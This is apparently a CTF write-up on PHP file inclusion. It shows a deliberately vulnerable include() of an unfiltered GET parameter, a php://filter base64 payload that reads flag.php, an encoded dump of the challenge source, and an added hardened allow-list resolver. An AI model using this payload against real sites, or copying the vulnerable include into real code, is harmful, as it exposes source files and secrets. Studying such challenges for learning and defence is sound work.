[CTF WEB] File Inclusion

File Inclusion

Challenge:

Find the FLAG in the challenge.

Vulnerable source

<meta charset='utf-8'>
<center><h1>文件阅读器</h1></center>
<!-- Word is the flag is in flag.php -->
<?php
error_reporting(0);
$f=$_GET['file'];
// Only directory traversal ("..") is rejected; stream wrappers such as php:// are not.
if(stripos($f,"..")===false)
{
	//;
}
else
{
	exit('invalid');
}
if(!$f)
{
	header('Location: ?file=test.txt');
}
else
{
	// The otherwise unfiltered value reaches include(), so any readable path or wrapper is loaded.
	include($f);
}
?>

Test method

http://localhost/?file=php://filter/read=convert.base64-encode/resource=flag.php

The check only rejects "..", and php://filter/read=convert.base64-encode/resource=flag.php contains none, so it passes; the filter wrapper then returns the file base64-encoded instead of executing it. Decode the base64 to recover the file contents and the key.

PG1ldGEgY2hhcnNldD0ndXRmLTgnPg0KPGNlbnRlcj48aDE+5paH5Lu26ZiF6K+75ZmoPC9oMT48L2NlbnRlcj4NCjwhLS0g5o2u6K+0ZmxhZ+WcqGZsYWcucGhw6YeMIC0tPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCiRmPSRfR0VUWydmaWxlJ107DQppZihzdHJpcG9zKCRmLCIuLiIpPT09ZmFsc2UpDQp7DQoJLy87DQp9DQplbHNlDQp7DQoJZXhpdCgnaW52YWxpZCcpOw0KfQ0KaWYoISRmKQ0Kew0KCWhlYWRlcignTG9jYXRpb246ID9maWxlPXRlc3QudHh0Jyk7DQp9DQplbHNlDQp7DQoJaW5jbHVkZSgkZik7DQp9DQo/Pg==
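A hardened replacement for the include above, added here as an example and not part of the original write-up; resolve_include(), the pages/ directory and the allow-list are assumptions.

```php
<?php
// Added example (not from the original challenge): a safe way to map ?file= to an include.
declare(strict_types=1);

/**
 * Map a user-supplied "file" value to a real path that is safe to include,
 * or return null if the request must be refused.
 */
function resolve_include(string $requested, string $baseDir, array $allowList): ?string
{
    // 1. Refuse anything that looks like a stream wrapper (php://, data://, http://, ...).
    //    The challenge code only checked for "..", which is why php://filter slipped through.
    if (preg_match('#^[a-z0-9.+-]+://#i', $requested)) {
        return null;
    }
    // 2. Allow-list: only a fixed set of bare file names may be included at all
    //    (any path separator makes basename() differ from the raw value).
    $name = basename($requested);
    if ($name !== $requested || !in_array($name, $allowList, true)) {
        return null;
    }
    // 3. Resolve the real path and confirm it still lies inside $baseDir
    //    (defence in depth against symlinks or a mistaken allow-list entry).
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Request handling equivalent to the challenge, using the hardened resolver.
$f = $_GET['file'] ?? '';
if ($f === '') {
    header('Location: ?file=test.txt');
    exit;
}
// Assumed layout: includable pages live in ./pages and only test.txt is permitted.
$path = resolve_include($f, __DIR__ . '/pages', ['test.txt']);
if ($path === null) {
    http_response_code(400);
    exit('invalid');
}
include $path;
```

With this resolver, php://filter/..., ../flag.php and a bare flag.php are all refused, while ?file=test.txt still works.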
posted @ 2018-09-29 14:00  17bdw  views (1364)  comments (0)